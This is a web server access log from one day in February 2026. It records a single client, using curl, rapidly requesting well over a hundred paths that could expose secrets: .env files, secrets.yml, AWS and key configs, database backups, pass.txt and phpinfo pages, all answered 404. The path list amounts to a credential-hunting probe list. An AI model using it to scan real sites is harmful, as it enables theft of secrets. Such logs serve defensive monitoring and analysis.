www.hanmocnn.co.kr "/backup.zip" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/base_dir/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/basic-network/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bgoldd/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bitcoind/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/blankon/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/blob/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/blog/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/blogs/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/blue/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bookchain-client/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Booking/Default.aspx" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bootstrap/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/boxes/oracle-vagrant-boxes/ContainerRegistry/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/boxes/oracle-vagrant-boxes/Kubernetes/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/boxes/oracle-vagrant-boxes/OLCNE/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bucoffea/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/build.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/build/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/build/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/build/_app/immutable/chunks/[chunk].[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/build/_app/immutable/entry/app.[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/build/entry.client-[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/build/main.ba0c34b7.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/build/routes/index-[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cache.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cardea/backend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cdw-backend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cgi-bin/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cgi-bin/pass.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ch2-mytodo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ch6-mytodo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ch6a-mytodo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ch7-mytodo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ch7a-mytodo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ch8-mytodo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:11:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ch8a-mytodo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ch8b-mytodo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Chai/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/challenge/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/challenges/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/charts/liveObjects/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/chat-client/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/chiminey/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/chunk-B2FODB4I.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ci/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/client-app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/client/mutual-fund-app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/client/src/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ClientApp/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/clld_dir/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cloud/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cmd/testdata/expected/dot_env/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/code/api/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/code/web/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/CodeGolf.Web/ClientApp/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/codenames-frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/collab-connect-web-application/server/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/collected_static/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/community/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/compose/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.yaml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/.env.dev" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/.env.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/.env.production" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/aws.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/cache.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/config.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/config.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/default.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/keys.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/production.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/secrets.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/settings.py" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ContainerRegistry/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/containers/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/content/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/control/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/core/app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/core/Datavase/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/core/persistence/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/core/src/main/resources/org/jobrunr/dashboard/frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/counterblockd/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/counterwallet/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cp/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cronlab/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/cryo_project/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/css/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/custom/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/d/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dashboard/i.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dashboard/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dashboard/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dashboard/test.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/data/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/database/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dataset1/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dataset2/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/db-admin/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/db.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/db.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/db_backup.sql" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug/default/view" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug/default/view.html" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/default/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/delivery/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/demo-app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/demo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dep.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/deploy.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/deploy/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/deployment-config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dev-api/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dev-env/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dev.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dev/.env.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dev_env/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/developer.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/developer/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/developerslv/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/development/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/devs.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/devtools" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/directories/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dist/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dist/js/app.[hash].js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/django-blog/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/django/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/django_project_path/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:12:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/doc/.env" [Client 185.177.72.38] 